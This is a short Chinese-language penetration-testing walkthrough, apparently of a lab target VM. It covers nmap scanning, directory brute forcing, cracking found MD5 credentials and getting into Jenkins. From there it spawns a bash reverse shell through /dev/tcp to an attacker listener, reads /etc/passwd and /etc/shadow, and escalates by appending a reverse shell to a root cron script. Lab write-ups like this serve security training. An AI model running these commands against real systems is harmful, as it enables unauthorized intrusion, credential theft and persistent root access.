信息收集
第一步:本地主机发现
sudo nmap -sn [ip].0/24
第二布:扫描主机
sudo nmap --min-rate 10000 -p- [ip]
10000为中值扫描速度,实际渗透中需根据实际情况进行动态调整
第三步:继续扫描
sudo nmap -sT -sV -O -p22,80,3306,8080 192.168.208.130
第四步:UDP扫描
sudo nmap -sU -p22,80,3306,8080 192.168.208.130
第五步:默认脚本扫描
sudo nmap --script=vuln -p22,80,3306,8080 192.168.208.130
WEB渗透
打开web界面
打开8080端口发现是后台登录界面
目录爆破
dirb爆破
sudo dirb http://192.168.208.130
未发现更多有价值信息
gobuster爆破
sudo gobuster dir
查看access.html界面
发现凭据
通过md5crack解密出凭据
进入后台
Jenkins渗透
构建新项目,
构建shell
写入shell
/bin/bash -i >& /dev/tcp/192.168.208.128/4444 0>&1
用4444监听
sudo nc -lvnp 4444
立即构建
进入bash
whoami
uname -a
ip a / ifconfig / dpkg -l
sudo -l
cat /etc/passwd or cat /etc/shadow
crontab
cat /etc/crontab
cat /etc/script/CleaningScript.shc
echo "/bin/bash -i >& /dev/tcp/192.168.208.128/4443 0>&1" >> /etc/script/CleaningScript.sh